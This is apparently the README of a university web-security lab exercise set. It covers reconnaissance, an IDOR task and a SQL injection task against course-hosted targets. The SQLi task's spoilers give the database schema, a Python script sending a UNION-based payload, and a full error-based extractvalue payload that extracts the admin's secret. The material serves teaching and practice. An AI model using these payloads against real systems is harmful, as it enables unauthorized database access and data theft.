Skip to content

Latest commit

 

History

History

lab5

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
idor
idor
 
 
sqli
sqli
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
docker-compose.yml
docker-compose.yml
 
 

README.md

Lab5

5 laboratoria będą podsumowaniem tego, czego nauczyliśmy się przez cały semetr. Dla przypomnienia, było to:

  • lab 1 - brute-force katalogów (narzędzia tj. gobuster, dirbuster, dirsearch), IDOR, rozpoznawanie technologii (Wappalyzer)
  • lab 2 - path traversal, eskalacja do RCE
  • lab 3 - SQLi, SSTI, command injection,
  • lab 4 - rekonesans subdomen (masscan, certspotter), SSRF, atakowanie serwisów (nmap).

Zad 1

Zadanie jest otwarte, jest w nim kilka podatności. Należy podejść do niego, jak do prawdziwego celu, czyli rekonesansu:

  • subdomen,
  • katalogów,
  • portów,
  • technologii,
  • kodu źródłowego strony.

https://aghws.jctf.pl/lab5/task1/

W zadaniu nie działa funkcja logowania, po wylogowaniu należy stworzyć nowe konto. Do wykonania zadania nie trzeba się wylogowywać.

Zad 2 - sqli

Find content of admin's secret.

https://aghws.jctf.pl/lab5/task2/users/?show REMEMBER ABOUT SLASH AT THE END OF THE LINK, for example /lab5/task2/users/

Little help:

MariaDB [sqli_db]> describe users_user;
+--------------+--------------+------+-----+---------+-------+
| Field        | Type         | Null | Key | Default | Extra |
+--------------+--------------+------+-----+---------+-------+
| last_login   | datetime(6)  | YES  |     | NULL    |       |
| is_superuser | tinyint(1)   | NO   |     | NULL    |       |
| first_name   | varchar(30)  | NO   |     | NULL    |       |
| last_name    | varchar(150) | NO   |     | NULL    |       |
| email        | varchar(254) | NO   |     | NULL    |       |
| is_staff     | tinyint(1)   | NO   |     | NULL    |       |
| is_active    | tinyint(1)   | NO   |     | NULL    |       |
| date_joined  | datetime(6)  | NO   |     | NULL    |       |
| username     | varchar(200) | NO   | UNI | NULL    |       |
| password     | varchar(65)  | NO   |     | NULL    |       |
| secret_id    | int(11)      | NO   | PRI | NULL    |       |
+--------------+--------------+------+-----+---------+-------+

MariaDB [sqli_db]> describe users_secret;
+----------+--------------+------+-----+---------+----------------+
| Field    | Type         | Null | Key | Default | Extra          |
+----------+--------------+------+-----+---------+----------------+
| id       | int(11)      | NO   | PRI | NULL    | auto_increment |
| content  | varchar(200) | NO   |     | NULL    |                |
| pub_date | datetime(6)  | NO   |     | NULL    |                |
+----------+--------------+------+-----+---------+----------------+
Spoiler 1
  • concentrate on login view (function)
Spoiler 2
  • did you find sql injection?
  • make some basic union select payload (select correct amont of columns)
Spoiler 3
  • you may want to script it (in python for example)
Spoiler 4
  • pasta:
#!/usr/bin/env python
# -*- coding: utf-8 -*-


import requests


# proxies = {'http': 'http://localhost:8080'}
proxies = {}

if __name__ == "__main__":
    url = 'https://aghws.jctf.pl:443/lab5/task2/users/login/'
    payload = '''
    x' union select 0,1,2,3,5,6,1,1,1,1,1 from users_user WHERE 1=1#
    '''
    resp = requests.get(url, proxies=proxies, 
                    params={'username': 'whatever', 'password': payload.strip()})
    print(resp.text)
  • now, you may read data from database using blind or error-based techniques
  • blind was presented at lab 3, but error-based is much easier
Spoiler 5
  • use extractvalue
Spoiler 6
  • like: x' union select extractvalue(rand(),concat(0x3a,(select 'lol'))),1,2,3,5,6,1,1,1,1,1 #
  • now replace 'lol' with something better
Spoiler 7 - solution here!
  • bum: x' union select extractvalue(rand(),concat(0x3a,(select content from users_secret join users_user where username='admin' LIMIT 1))),1,2,3,5,6,1,1,1,1,1 #

Zad 3 - idor

https://aghws.jctf.pl/lab5/task3/

Few idors, hidden page, bruteforcing/scripting.